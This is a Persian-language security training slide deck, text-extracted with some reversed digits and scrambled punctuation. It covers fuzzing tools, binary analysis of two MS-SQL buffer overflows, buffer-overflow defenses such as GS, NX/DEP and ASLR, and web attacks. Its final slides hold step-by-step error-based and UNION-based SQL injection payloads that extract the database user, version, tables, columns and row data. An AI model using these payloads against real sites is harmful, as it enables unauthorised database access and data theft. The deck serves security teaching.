       ‫‪ :PROTOS‬بررسی موثر پروتکل هایی همچون ‪SNMP ,SIP‬و ...‬        ‫‪‬‬
 ‫‪ :CodeNomicon‬شرکتی تجاری ، اراده دهنده ‪ Fuzzer‬برای بیش از 08 پروتکل‬      ‫‪‬‬
               ‫مختلف ، وابسته به تیم تحقیقاتی بنیانگذار ‪PROTOS‬‬
 ‫‪ General Fuzzing Framework : SMUDGE‬برای پروتکل های تحت شبکه‬          ‫‪‬‬
‫‪ : SPIKE‬یکی از شناخته شده ترین ‪ Fuzzer‬های ‪ General‬برای پروتکل های تحت‬      ‫‪‬‬
                                     ‫شبکه‬
  ‫‪ : Peach‬یک ‪ framework‬مبتنی بر ‪ Python‬با پشتیبانی از پروتکل های متعدد‬     ‫‪‬‬
             ‫‪ : MangleMe‬یک ‪ fuzzer‬برای بررسی ‪ Browser‬ها‬       ‫‪‬‬
                 ‫‪ : Mangle‬یک فازر برای بررسی ‪File-format‬‬    ‫‪‬‬
                      ‫‪IRC Client Fuzzer : IRCfuzz‬‬     ‫‪‬‬
                     ‫‪COM Object fuzzer : COMBust‬‬      ‫‪‬‬
              ‫لیستی از برخی دیگر از ‪ Fuzzer‬های شناخته شده‬       ‫‪‬‬
               ‫‪http://www.fuzzing.org/fuzzing-software‬‬      ‫‪‬‬                                          ‫82‬
‫شناسایی مشکالت امنیتی نرم افزار- ‪Fuzzing‬‬
   ‫‪DEMO‬‬
                   ‫92‬
        ‫شناسایی مشکالت امنیتی نرم افزار- ‪Binary Analyze‬‬
 ‫در صورت در دسترس نبودن کد نرم افزار ، این روش بسیار کارآمد ، و درعین حال مشکل‬     ‫‪‬‬
                                        ‫میباشد‬
  ‫بسیاری از مشکالت امنیتی که در نرم افزارهای کد باز رفع شده اند هنوز در نرم افزارهای‬  ‫‪‬‬
                       ‫انحصاری)‪ (closed-source‬دیده میشوند‬
                  ‫این روش هنوز یک تکنیک نوپا و ناقص بشمار می آید‬    ‫‪‬‬
 ‫همانند بررسی کد ، در این روش نیز روند و منطق نرم افزار بررسی میگردد ، اما به روش‬    ‫‪‬‬
                                   ‫مهندسی معکوس!‬
                     ‫نیازمند درک و تجربه باال در بررسی زبان ماشین‬  ‫‪‬‬
‫اگرچه تکنیک ‪ Fuzzing‬در بررسی نرم افزارهای ‪ closed-source‬بسیار مفید میباشد اما‬      ‫‪‬‬
 ‫بررسی تمام قابلیت ها و توابع نرم افزار توسط ‪ Fuzzing‬بسیار مشکل و گاهآ نا ممکن است‬
                              ‫)‪(Low Code Coverage‬‬
       ‫‪ Binary Audit‬محدوده بیشتری )در واقع کل( از نرم افزار را پوشش می دهد.‬    ‫‪‬‬
  ‫همانند بررسی کد ، توابع آسیب پذیر در فایل باینری نیز دارای مشخصه خاص خود هستند‬    ‫‪‬‬
                                             ‫03‬
          ‫شناسایی مشکالت امنیتی نرم افزار- ‪Binary Analyze‬‬
                     ‫روش ها و دیدگاه های مختلف انجام ‪Static Binary Analyze‬‬         ‫‪‬‬
‫‪ ‬جستجوی ‪ Pattern‬های مربوط به فراخوانی توابع آسیب پذیر مانند ‪ strcpy,strcat,sprintf‬و سایر موارد‬
                                             ‫مشابه‬
‫در صورتی که کیفیت کد نرم افزار پایین باشد و یا هدف یک بررسی سریع و سطحی باشد از این روش استفاده میشود‬    ‫‪‬‬

                       ‫‪ ‬آنالیز و بررسی حلقه ها)‪ (loop‬و توابع ‪ read/write‬مشکوک‬
                        ‫:‪A variable indexed write into a character array‬‬
                        ‫:‪A variable indexed write to a local stack buffer‬‬
                 ‫:‪A write to a pointer, followed by an increment of that pointer‬‬
                   ‫:‪A sign extended copy from an attacker-controlled buffer‬‬
 ‫‪ ‬بررسی منطق نرم افزار . برخی از ضعف های امنیتی هیچ ارتباطی با مشکالت ‪Memory corruption‬‬
              ‫نداشته و ناشی از منطق اشتباه نرم افزار در برخورد با داده ها هستند.‬
                               ‫مثال : مشکل امنیتی ‪IIS Double Decode‬‬      ‫‪‬‬
                     ‫کشف این دسته از مشکالت توسط ‪ Binary Audit‬بسیار مشکل میباشد‬     ‫‪‬‬

                 ‫‪ ‬بررسی تفاوت های بین نسخه های مختلف یک برنامه آسیب پذیر )‪(Diffing‬‬
                ‫ممکن است جزئیات مشکل امنیتی دقیقآ منتشر نشود ، اما آگاهی از آنها الزم باشد‬  ‫‪‬‬
      ‫ممکن است تولید کننده نرم افزار بدون اعالم عمومی ، اقدام به رفع یک مشکل امنیتی در نرم افزار کند‬  ‫‪‬‬
        ‫استفاده از ابزارهایی که تفاوت های میان دو نسخه متفاوت از یک فایل را نمایان میکنند )‪(BinDiff‬‬  ‫‪‬‬
 ‫-‪http://www.breakingpointsystems.com/community/blog/exploiting-iis-via-htmlencode‬‬              ‫‪‬‬
                          ‫‪http://www.zynamics.com/files/ms08001.swf‬‬         ‫‪‬‬

        ‫‪ ‬در همه این موارد ، استفاده از ابزارهای پیشرفته برای کمک به بررسی ، اجتناب ناپذیر است‬
         ‫بررسی گراف های رسم شده بر اساس بخش های مختلف نرم افزار ، کار را بسیار آسان تر میکند‬    ‫‪‬‬
                 ‫قابلیت های رسم گراف در نرم افزار ‪ IDA Pro‬و نرم افزار جانبی ‪BinNavy‬‬     ‫‪‬‬

                                                         ‫13‬
‫شناسایی مشکالت امنیتی نرم افزار- ‪Binary Analyze‬‬
                       ‫23‬
         Binary Analyze -‫شناسایی مشکالت امنیتی نرم افزار‬
     ‫ ، ناشی از استفاده اشتباه از‬MS-SQL ‫مثال : مشکل سرریز بافر در‬              
                              sprintf()
mov edx, [ebp+var_24C8]        ;‫متغیر با سایز 4201 بایت که از پکت ارسالی خوانده میشود‬
push edx
push offset aSoftwareMic_17 ; “SOFTWARE\\Microsoft\\Microsoft SQL
Server”...
push offset aSSMssqlserverC ; “%s%s\\MSSQLServer\\CurrentVersion”
lea eax, [ebp+var_84]         ; ! ‫بافر پشته با سایز 821 بایت‬
push eax
call ds:sprintf
add esp, 10h

 strcpy() ‫ ، ناشی از استفاده اشتباه از‬MS-SQL ‫مشکل امنیتی دیگری در‬                
mov eax, [ebp+arg_4]
add eax, [ebp+var_218]
push eax
lea ecx, [ebp+var_214]             ; ‫بافر پشته با حجم 215 بایت که محتوای آن از پکت‬
                            ‫دریافت شده و بدون کنترل سایز کپی میشود‬
push ecx
call strcpy
add esp, 8
                                                 33
                        ‫شناسایی مشکالت امنیتی نرم افزار‬
    ‫سه روش کلی یاد شده هر یک به تنهایی میتوانند نتیجه های خوبی را در حاصل شوند‬       ‫‪‬‬
             ‫ترکیب روش های فوق ، بازدهی آنالیز را بسیار افزایش میدهد‬       ‫‪‬‬
             ‫یک دیدگاه در این مورد ، ترکیب ‪ Fuzzing‬با آنالیز کد میباشد‬       ‫‪‬‬
 ‫‪ ‬همزمان با ‪ ، Fuzzing‬سورس کد نیز بررسی میگردد تا میزان ‪ cove-coverage‬در زمان‬
                              ‫‪ Fuzzing‬مشخص گردد .‬
‫‪ ‬با این روش میتوان مشخص کرد که کدام یک از بخش های نرم افزار یا کد توسط ‪ Fuzzer‬پوشش‬
                      ‫داده شده ، و کدام بخش ها عمآل بررسی نشده‬
                 ‫‪http://en.wikipedia.org/wiki/Code_coverage ‬‬
    ‫دیدگاه دیگر ، ترکیب ‪ Fuzzing‬با آنالیز ‪ Binary‬در زمان اجرای نرم افزار میباشد.‬      ‫‪‬‬
          ‫‪ ‬استفاده از ‪ Debugger/Disassembler‬ها برای راهنمایی ‪ Fuzzer‬ها‬
                       ‫‪ ‬افزایش ‪ Code Coverage‬در ‪Fuzzing‬‬
 ‫‪ ‬مقاله جالب ‖‪http://uninformed.org/?v=all&a=27&t=pdf ―Effective Bug Discovery‬‬
      ‫‪ ―Evolutionary Fuzzing System‖ ‬یک ‪ framework‬با دیدی جدید نسبت به ‪Fuzzing‬‬
     ‫‪ ‬فراگرفتن پروتکل های جدید بصورت پویا و کمک گرفتن از آنالیز نرم افزار در زمان اجرا‬
                     ‫‪http://www.vdalabs.com/tools/efs_gpf.html ‬‬
                                                ‫43‬
                           ‫مقابله با حمالت سرریز بافر‬
 ‫اولین و بهترین روش مقابله با این دسته از مشکالت امنیتی ، رعایت نکات امنیتی در زمان‬    ‫‪‬‬
                                ‫تولید نرم افزار میباشد‬
                    ‫استفاده از متدلوژی ‪ SDLC‬در تولید نرم افزار‬     ‫‪‬‬
 ‫مقابله به روش پیشگیری ، تنها در صورتی ممکن است که سورس کد نرم افزار در دسترس‬       ‫‪‬‬
                                        ‫باشد ،‬
                            ‫اما مشکالتی نیز وجود دارد !‬    ‫‪‬‬
                                ‫نرم افزارهای قدیمی‬  ‫‪‬‬
                            ‫عدم دسترسی به ‪Developer‬‬    ‫‪‬‬
                       ‫عدم آگاهی ‪ Developer‬از نکات امنیتی‬   ‫‪‬‬
                               ‫اشتباهات برنامه نویسی‬  ‫‪‬‬
                         ‫نرم افزار های ‪! Closed-Source‬‬    ‫‪‬‬
‫راهکارهایی برای مقابله با این قبیل مشکالت وجود دارند ، اما هیچ یک مشکل را بطور کامل‬    ‫‪‬‬
        ‫حل نکرده و تنها شرایط برای استفاده از مشکل امنیتی را مشکل تر می کنند .‬
  ‫بسته به شرایط و اختیارات و امکانات در دسترس ، از یک یا چند راهکار استفاده میشود.‬   ‫‪‬‬
                                             ‫53‬
                       ‫مقابله با حمالت سرریز بافر‬

‫دیدگاه های مختلفی برای مقابله با حمالت سرریز بافر وجود دارد و‬       ‫‪‬‬
            ‫بر همین اساس روش های مختلف نیز:‬
    ‫‪ ‬تشخیص مشکالت امنیتی در خالل روند تولید ، و گوشزد کردن آنها‬
 ‫‪ ‬سعی در پیشگیری از بروز مشکالت سرریز بافر و اضافه کردن تمهیداتی‬
                    ‫به برنامه ، در زمان کامپایل کردن‬
‫‪ ‬پیاده سازی تمهیدات امنیتی در سطح سیستم عامل برای تشخیص و یا مقابله‬
                         ‫با حمالت سرریز بافر‬
   ‫‪ ‬استفاده از بسته های نرم افزاری الحاقی به سیستم عامل ، برای جبران‬
                     ‫کمبود های امنیتی سیستم عامل‬
   ‫‪ ‬استفاده ازبسته های نرم افزاری جانبی ، برای جبران و یا تکمیل کمبود‬
                        ‫های امنیتی سیستم عامل‬
  ‫‪ ‬ترکیب امکانات امنیتی سیستم عامل با امکانات اراده شده توسط پردازنده‬


                                      ‫63‬
                                       ‫مقابله با حمالت سرریز بافر‬
                                                     ‫کامپایلرهای امن‬  ‫‪‬‬
                                            ‫‪Visual Studio >2003 ‬‬
                             ‫محافظت در برابر حمالت سرریز بافر در ‪Stack‬‬         ‫‪‬‬
‫اساس بخش زیادی از امنیت در مقابل حمالت ‪ stack overflow‬در ویندوز سرور 1‪ 2003 SP‬و 2‪ XP SP‬و نسخه‬           ‫‪‬‬
                                               ‫های جدید تر‬
    ‫اضافه کردن بخش هایی به کد در زمان کامپایل )‪ (Buffer Security Checks‬برای کنترل صحت ‪return‬‬          ‫‪‬‬
                               ‫‪ address‬ها و سایر بخش های مهم ‪Stack‬‬
                                    ‫آشنایی با مفهوم ‪Stack Cookies‬‬       ‫‪‬‬
                ‫اضافه شده به ‪ Visual Studio‬از نسخه 3002 و فعال بصورت پیشفرض‬            ‫‪‬‬
                   ‫‪ /GS‬مشکالت امنیتی را حل نمیکند بلکه استفاده از آنها را مشکل میکند‬       ‫‪‬‬
                        ‫تکنیک هایی برای دور زدن این مکانیزم امنیتی وجود دارد‬        ‫‪‬‬
                            ‫بازنویسی اشاره گر ‪ SEH‬برای اجرای کد در حافظه‬    ‫‪‬‬
            ‫‪http://www.ngssoftware.com/papers/defeating-w2k3-stack-protection.pdf‬‬       ‫‪‬‬
                 ‫استفاده از ‪ /SafeSEH‬برای محافظت از اشاره گر ‪ SEH‬و مقابله با مشکل ‪/GS‬‬       ‫‪‬‬
  ‫کلیه بخش های نرم افزار میبایست توسط این مکانیزم کامپایل شده باشند. وجود برنامه ها / توابع کتابخانه ای محافظت‬  ‫‪‬‬
                                         ‫نشده ، کل سیستم را تهدید میکند‬
                    ‫‪ ‬ماژول های اضافه شده به ‪( StackGuard , ProPolice ,…) GCC‬‬
                                       ‫آستفاده از ایده ‪Stack Canaries‬‬    ‫‪‬‬
                           ‫قابل استفاده در 1.3> ‪ GCC‬با سویچ ‪-fstack-protector‬‬      ‫‪‬‬
                                   ‫فعال بصورت پیشفرض در 1.4> ‪GCC‬‬        ‫‪‬‬
                                ‫تکنیک هایی برای دور زدن این مکانیزم امنیتی :‬    ‫‪‬‬
         ‫‪http://www.coresecurity.com/files/attachments/Richarte_Stackguard_2002.pdf‬‬       ‫‪‬‬
                                                              ‫73‬
                                              ‫مقابله با حمالت سرریز بافر‬
                                                    ‫امکانات ارائه شده توسط پردازنده‬    ‫‪‬‬
                                                      ‫‪(No eXecute) NX Bit‬‬      ‫‪‬‬
                                  ‫تقسیم نواحی مختلف حافظه برای ذخیره داده ها و یا دستورات پردازنده‬  ‫‪‬‬
‫پیدا سازی شده در پردازنده های ‪ Intel‬از نسل 4 ‪ AMD ، Pentium‬و ‪ . SPARC‬پردازنده های 46 بیتی پیش از انواع 23 بیتی به این‬         ‫‪‬‬
                                                          ‫قابلیت مجهز شدند‬
   ‫پردازنده مجهز به ‪ NX/DX‬به تنهایی قادر به جلوگیری از حمالت نیست بلکه این قابلیت میبایست توسط سیستم عامل به کار گرفته شود‬     ‫‪‬‬
                ‫تقریبآ تمامی سیستم های عامل کنونی ) نسخ جاری و جدید ( هر یک به نحوی از این قابلیت استفاده میکنند.‬   ‫‪‬‬
 ‫‪ NX bit‬در واقع اشاره به آخرین بیت معنی دار از ‪ Page table entry‬در حافظه دارد . 0 بودن این بیت به معنی ‪ executable‬بودن‬        ‫‪‬‬
                       ‫محتوای این بخش )‪ (page‬و 1 بودن به معانی این است که این بخش تنها حاوی داده ها است.‬
            ‫در سیستم های ‪ 32bit‬این بیت در واقع وجود ندارد و این راهکار بصورت ‪ Software Emulated‬اجرا میگردد‬         ‫‪‬‬
                         ‫‪ NX‬امکان مقابله با حمالت ‪ Stack Overflow‬و ‪ Heap Overflow‬را میسر میکند‬        ‫‪‬‬

                                            ‫تمهیدات پیاده سازی شده در سطح سیستم عامل‬       ‫‪‬‬
  ‫بسیاری از قابلیت های امنیتی پیاده سازی شده در سطح سیستم عامل مبتنی بر ‪ NX‬میباشد و هر سیستم عامل نسخه و روشی‬              ‫‪‬‬
                                   ‫مربوط به خود را معماری کرده و بکار می برد .‬
             ‫در صورت عدم وجود ‪ CPU‬مجهز به ‪ NX‬این قابلیت بصورت کامآل مجازی پیاده سازی میگردد‬                 ‫‪‬‬
 ‫)‪ (Address Space Layout Randomization‬یکی دیگر از تکنیک های مورد استفاده برای مقابله با حمالت سرریز‬                    ‫‪‬‬
                                                    ‫بافر میباشد‬
 ‫مفهوم ‪ ASLR‬در سیستم عامل های مختلف با نام های مختلفی پیاده سازی شده اما وجوه مشترک بسیاری میان آنها وجود دارد‬              ‫‪‬‬
 ‫‪ ASLR‬بصورت تصادفی اقدام به موقعیت دهی به بخش های مختلف یک پروسه در حافظه مینماید که عمومآ شامل ‪Base‬‬                   ‫‪‬‬
        ‫‪ ، Address‬موقیت قرار گرفتن توابع کتابخانه ایی ، ‪ Stack‬و ‪ Head‬در محدوده آدرس آن پروسه میگردد.‬
                                                                       ‫83‬
                            ‫مقابله با حمالت سرریز بافر‬
                 ‫مکانیزم های پیاده سازی شده در سیستم عامل های مختلف:‬    ‫‪‬‬
                ‫‪ : FreeBSD ‬پشتیبانی از پردازنده های ‪ NX‬از نسخه 3.5‬
       ‫‪ : Linux ‬پشتیبانی از پردازنده های ‪ 32/64bit‬دارای ‪ NX‬از کرنل نسخه 8.6.2‬
   ‫کرنل ‪ 32bit‬ارائه شده توسط برخی نگارش ها مانند 6‪OpenSUSE Ubuntu , Fedora C‬‬   ‫‪‬‬
           ‫بصورت پیشفرض برای استفاده از ‪ NX‬سخت افزاری تنظیم نشده اند‬
   ‫‪ : RedHat ‬پشتیبانی از ‪ NX‬تمامی ‪ CPU‬هاتوسط راهکار اختصاصی ‪. Exec Shield‬‬
   ‫‪ Emulated-NX‬تنها بر روی پردازنده های 23‪ IA‬پشتیبانی میگردد. ارائه شده در ‪ FC‬و‬
                                        ‫‪RHEL‬‬
‫‪ : PAX ‬این تکنولوژی برای پیاده سازی ‪ NX‬در سیستم های فاقد امکان سخت افزاری طراحی شده‬
                       ‫و کلیه پردازنده های 68‪ x‬را پشتیبانی میکند.‬
           ‫کرنل لینوکس هنوز بطور پیشفرض این تکنولوژی را بکار نبرده است‬  ‫‪‬‬
 ‫پشتیبانی از ‪,PowerPC ,PA-RISC ,(and 64 bit 32) MIPS ,IA-64 ,AMD64 ,Alpha‬‬     ‫‪‬‬
                                    ‫‪SPARC‬‬
  ‫استفاده شده بطور پیشفرض در ‪Adamantix , Hardened Gentoo , Hardened Linux‬‬     ‫‪‬‬

  ‫‪ : Mac OSX ‬پشتیبانی از ‪ NX‬پردازنده های اینتل از نسخه 4.01 و کلیه پردازنده های تحت‬
                                       ‫پوشش ‪OSX‬‬
                                              ‫93‬
                                                      ‫مقابله با حمالت سرریز بافر‬
                                          ‫مکانیزم های پیاده سازی شده در سیستم عامل های مختلف:‬            ‫‪‬‬
       ‫‪ : Windows‬پشتیبانی از ‪ NX‬برای اولین بار در معماری 68‪ x‬از نسخه 2‪ XP SP‬و 1‪2003 Server SP‬‬                            ‫‪‬‬
                               ‫ارائه شده تحت نام ‪( Data Execution Prevention ) DEP‬‬                    ‫‪‬‬
                        ‫بطور پیشفرض تنها پروسه ها و سرویس های اصلی سیستم عامل محافظت میشوند‬                  ‫‪‬‬
                            ‫در صورت پشتیبانی پردازنده از ‪ DEP ، NX‬بطور خودکار فعال میگردد‬                  ‫‪‬‬
‫در نسخه های اولیه ‪ ، DEP‬از ‪ ASLR‬استفاده نشده ! امکان دور زدن ‪ DEP‬و حتی غیر فعال کردن این مکانیزم توسط حمالت -‪return‬‬                  ‫‪‬‬
                                           ‫‪ to-libc‬به همین دلیل میسر میشود.‬
                        ‫مثالی عینی از حمله به ‪ DEP‬حتی با وجود بکار بستن کلیه تمهیدات امنیتی ‪ NX‬و سیستم عامل!‬        ‫‪‬‬
        ‫‪http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/dcerpc/msdns_zonename.rb‬‬                    ‫‪‬‬
                    ‫مقاله ای بسیار جالب از نحوه دور زدن مکانیزم ‪http://uninformed.org/?v=2&a=4 NX+DEP‬‬              ‫‪‬‬

 ‫‪ (Software DEP) SafeSEH‬تکنولوژی دیگری میباشد که به ‪ NX‬ارتباطی نداشته و برای حفاظت علیه حمالت برای سو استفاده از‬                   ‫‪‬‬
                                                ‫‪ SEH‬پیاده سازی شده است‬
                               ‫استفاده از این تکنولوژی منوط به استفاده نرم افزار از آن در زمان تولید )کامپایل( است‬  ‫‪‬‬
    ‫بکمک ‪ SafeSEH‬سیستم عامل تنها اجازه استفاده از ‪ Exception Handler‬هایی را به نرم افزار میدهد که قبآل تعریف و ‪ register‬شده اند.‬        ‫‪‬‬
                    ‫ویندوز ‪ Vista‬مبتنی بر نسخه جدید ‪ DEP‬میباشد که از تکنولوژی ‪ ASLR‬بهره می برد.‬                  ‫‪‬‬
        ‫در صورتی که پردازده از ‪ NX‬پشتیبانی نکند ، ویندوز پشتیبانی از این امکان بصورت ‪ Software-Emulated‬را ندارد‬                 ‫‪‬‬

                            ‫‪ : NetBSD‬بهره گیری از ‪ Non Executable Heap/Stack‬از نسخه 0.2‬                    ‫‪‬‬
           ‫پشتیبانی از ‪amd64, sparc64, sparc (sun4m, sun4d), powerpc (ibm4xx), alpha, sh5, hppa‬‬                       ‫‪‬‬
                                 ‫عدم پشتیبانی از ‪ Emulated-NX‬بطور پیشفرض‬                       ‫‪‬‬

                ‫‪ : OpenBSD‬پشتیبانی از ‪ NX‬تحت تکنولوژی اختصاصی با نام ‪ ( WAX ) W^X‬از نسخه 3.3‬                        ‫‪‬‬
                                           ‫پشتیبانی از ‪Alpha, AMD64, HPPA, and SPARC‬‬            ‫‪‬‬
                                             ‫پشتیباتی از ‪ Emulated-NX‬در برخی از پردازنده ها‬        ‫‪‬‬

                                   ‫‪ : Solaris‬بهره گیری از ‪ Non Executable Stack‬از نسخه 6.2‬                ‫‪‬‬
                                                                                ‫04‬
‫مقابله با حمالت سرریز بافر‬
            ‫14‬
                                ‫مقابله با حمالت سرریز بافر‬
                             ‫استفاده از نرم افزارها و الحاقیه های جانبی‬   ‫‪‬‬
                                       ‫‪ ‬بهبود امنیت سیستم عامل‬
‫اضافه کردن قابلیت های امنیتی مورد نیاز به سیستم عامل ، در صورت عدم وجود آنها بصورت پیشفرض‬      ‫‪‬‬
            ‫… , ‪ASLR , Non Executable Stack/Heap , Security Policies‬‬       ‫‪‬‬
                                         ‫‪GRSecurity‬‬  ‫‪‬‬
                   ‫‪http://www.grsecurity.net/features.php ‬‬
                            ‫‪ ‬اضافه کردن ‪ PAX‬به کرنل لینوکس‬
            ‫‪ ‬مقابله با ‪ Stack/Heap Overflow‬با استفاده از تکنیک های مختلف‬
                             ‫‪ ‬بهبود امنیت کامپایلر سیستم عامل‬
                             ‫‪ { ... ‬و بسیاری امکانات دیگر!{‬
                        ‫‪ ‬استفاده از نرم افزارهای جانبی برای مقابله با حمالت‬
                             ‫رایج در سیستم عامل های خانواده ویندوز‬   ‫‪‬‬
                     ‫جبران کمبود های امنیتی سیستم عامل مانند ‪ NX‬و ‪ASLR‬‬     ‫‪‬‬
           ‫تشخیص حمالت سرریز بافر از طریق مانیتور کردن حافظه و جلوگیری از آنها‬      ‫‪‬‬
        ‫استفاده در کنار قابلیت های امنیتی سیستم عامل ، برای پیچیده تر کردن مکانیزم حمالت‬  ‫‪‬‬
     ‫استفاده در مواردی که ناچار به استفاده از سیستم عامل های نا امن و یا نسخه های قدیمی هستیم‬  ‫‪‬‬
               ‫استفاده بعنوان ‪(Host Intrusion Prevention System) HIPS‬‬        ‫‪‬‬
                         ‫ارائه غالبآ بصورت بسته های نرم افزاری تجاری‬    ‫‪‬‬
         ‫‪http://www.eeye.com/html/products/blink/index.html : Eeye Blink‬‬       ‫‪‬‬
                     ‫‪http://www.wehnus.com/ : WhehnTrust‬‬         ‫‪‬‬
                     ‫‪http://www.ngsec.com : StackDefender‬‬         ‫‪‬‬
                               ‫... {!‪{Google for more‬‬      ‫‪‬‬
                                                     ‫24‬
                    ‫حمله به نرم افزارهای تحت وب‬

  ‫روز به روز بر محبوبیت و کاربرد نرم افزارهای تحت وب اضافه میگردد‬   ‫‪‬‬
 ‫نقطه شروع بسیاری از حمالت علیه سیستم ها و شبکه ها نرم افزارهای تحت‬   ‫‪‬‬
                              ‫وب میباشد‬
‫در بسیاری از موارد ، نرم افزارهای تحت وب تنها نقطه دسترسی یک نفوذگر‬   ‫‪‬‬
                 ‫به سیستم های هدف قرار گرفته میباشند‬
   ‫در ادامه برخی از حمالت شایع علیه نرم افزارهای تحت وب و همچنین‬   ‫‪‬‬
 ‫راهکارهایی برای پیشگیری و مقابله با این حمالت مورد بررسی قرار خواهد‬
                                ‫گرفت‬
                                    ‫34‬
            ‫حمله به نرم افزارهای تحت وب‬

‫ آشنایی با انواع حمالت مبتنی بر نرم افزارهای تحت وب‬
           Cross-Site Scripting   

               SQL Injection  

             Command Injection   

          Dynamic code execution   

          Cookie/Session Hijacking  

         Parameter/form Tampering   

              Buffer Overflows  

             Directory Traversal  

             Forceful Browsing  

           Information Leakages   

            Harvesting Attacks   
                            44
            ‫حمله به نرم افزارهای تحت وب‬

‫‪ ‬آشنایی با آناتومی حمله به سیستم های تحت وب‬
        ‫پویش برای شناسایی نرم افزار تحت وب‬   ‫‪‬‬
‫‪Web Spidering and User directed spidering‬‬    ‫‪‬‬
       ‫‪Discovering Hidden contents‬‬    ‫‪‬‬
‫‪Checking search engines and archive sites‬‬    ‫‪‬‬
     ‫‪Brute-forcing directories and files‬‬  ‫‪‬‬
    ‫‪Identify entry points for user inputs‬‬  ‫‪‬‬

         ‫جمع آوری اطالعات و شناسایی هدف‬    ‫‪‬‬
               ‫شناسایی وب سرور‬  ‫‪‬‬
          ‫شناسایی ‪Application Server‬‬  ‫‪‬‬

         ‫تست و بررسی وجود آسیب پذیری ها‬    ‫‪‬‬

       ‫طراحی روش حمله و نحوه پیاده سازی آن‬    ‫‪‬‬

                   ‫پیاده سازی حمله‬  ‫‪‬‬
                              ‫54‬
             ‫حمله به نرم افزارهای تحت وب‬

       ‫‪ ‬بررسی حمالت ‪SQL Injection‬‬
   ‫‪ ‬آشنایی با مکانیزم حمالت ‪SQL Injection‬‬
    ‫‪ ‬نحوه جستجو و شناسایی ‪SQL Injection‬‬
           ‫‪Blind SQL Injection ‬‬
           ‫‪Normal SQL Injection ‬‬
        ‫‪ ‬عبور از فرم های اعتبار سنجی‬
  ‫‪ ‬تزریق دستورات ) ‪(SELECT,UNION‬‬
‫‪SELECT,INSERT,UPDATE,DELETE‬‬
 ‫‪ ‬استخراج اطالعات مفید اولیه از بانک اطالعاتی‬
         ‫‪ ‬مشخص کردن نسخه بانک اطالعاتی‬
‫‪ ‬مشخص کردن نام کاربری مورد استفاده بانک اطالعاتی‬                          ‫64‬
                              ‫حمله به نرم افزارهای تحت وب‬
                   ‫استخراج اطالعات مورد نظر از بانک اطالعاتی بر اساس پیغام های خطا‬      
                                     : Integer ‫بررسی پارامتر از نوع‬  
                             http://[site]/page.asp?id=1 having 1=1–  
Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate  
                          function and there is no GROUP BY clause.
                                     : String ‫بررسی پارامتر از نوع‬  
                             http://[site]/page.asp?id=x' having 1=1–  
Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate  
                          function and there is no GROUP BY clause.
                                     ‫استخراج نام کاربر بانک اطالعاتی‬  
                      http://[site]/page.asp?id=1 or 1=convert(int,(USER))–  
       Syntax error converting the nvarchar value '[DB USER]' to a column of data type int.  

                                        ‫استخراج نام بانک اطالعاتی‬  
                    http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME))–   
       Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.  

                                       ‫استخراج نسخه بانک اطالعاتی‬  
                  http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))–    
     Syntax error converting the nvarchar value '[DB VERSION]' to a column of data type int.  

                                            ‫استخراج نام سرور‬  
              http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))–      
   Syntax error converting the nvarchar value '[SERVER NAME]' to a column of data type int.   
                                                        47
                                  ‫حمله به نرم افزارهای تحت وب‬
                        )2( ‫استخراج اطالعات مورد نظر از بانک اطالعاتی بر اساس پیغام های خطا‬       
  ‫استخراج نام اولین‬Table
     http://[site]/page.asp?id 1=or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85 –(((
     Syntax error converting the nvarchar value]' TABLE NAME 1 '[to a column of data type int.
  ‫استخراج نام دومین‬Table
     http://[site]/page.asp?id 1=or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name'<TABLE-
     NAME-1 –(('
     Syntax error converting the nvarchar value]' TABLE NAME 2 '[to a column of data type int.
  ‫استخراج نام سومین‬Table
     http://[site]/page.asp?id 1=or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name'<TABLE-
     NAME-2 --(('Syntax error converting the nvarchar value]' TABLE NAME 3 '[to a column of data type int.
  ‫استخراج نام اولین‬Column ‫ در‬Table
     http://[site]/page.asp?id 1=or 1=convert(int),select top 1 column_name from DBNAME.information_schema.columns where
     table_name'=TABLE-NAME-1 –(('
     Syntax error converting the nvarchar value]' COLUMN NAME 1 '[to a column of data type int.
  ‫استخراج نام دومین‬Column ‫ در‬Table
     http://[site]/page.asp?id 1=or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where
     table_name'=TABLE-NAME-1 'and column_name'<COLUMN-NAME-1 –(('
     Syntax error converting the nvarchar value]' COLUMN NAME 2 '[to a column of data type int.
  ‫استخراج اولین‬Field ‫ از اولین‬Row
     http://[site]/page.asp?id 1=or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 –((
     Syntax error converting the nvarchar value]' FIELD 1 VALUE '[to a column of data type int.
  ‫استخراج دومین‬Field ‫ از اولین‬Row
     http://[site]/page.asp?id 1=or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1 –((
     Syntax error converting the nvarchar value]' FIELD 2 VALUE '[to a column of data type int.
  ‫استخراج اولین‬Field ‫ از دومین‬Row
     http://[site]/page.asp?id 1=or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-
     1 NOT in') FIELD-1-VALUE ('order by COLUMN-NAME-1 desc –((
     Syntax error converting the nvarchar value]' FIELD 1 VALUE OF 2ND ROW '[to a column of data type int.                                                               48
                            ‫حمله به نرم افزارهای تحت وب‬
                        Union ‫استخراج اطالعات از بانک اطالعاتی با استفاده از‬  
  ‫مشخص کردن تعداد پارامترها‬
     http://[site]/page.asp?id=1 UNION SELECT ALL 1,2–
     All queries in an SQL statement containing a UNION operator must have an equal number of
     expressions in their target lists
     http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4–
     NO Error
  ‫استخراج نام کاربر بانک اطالعاتی‬
     http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4—
  ‫استخراج نام بانک اطالعاتی‬
     http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4—
  ‫استخراج نسخه بانک اطالعاتی‬
     http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4—
  ‫استخراج نام‬Table‫های بانک اطالعاتی‬
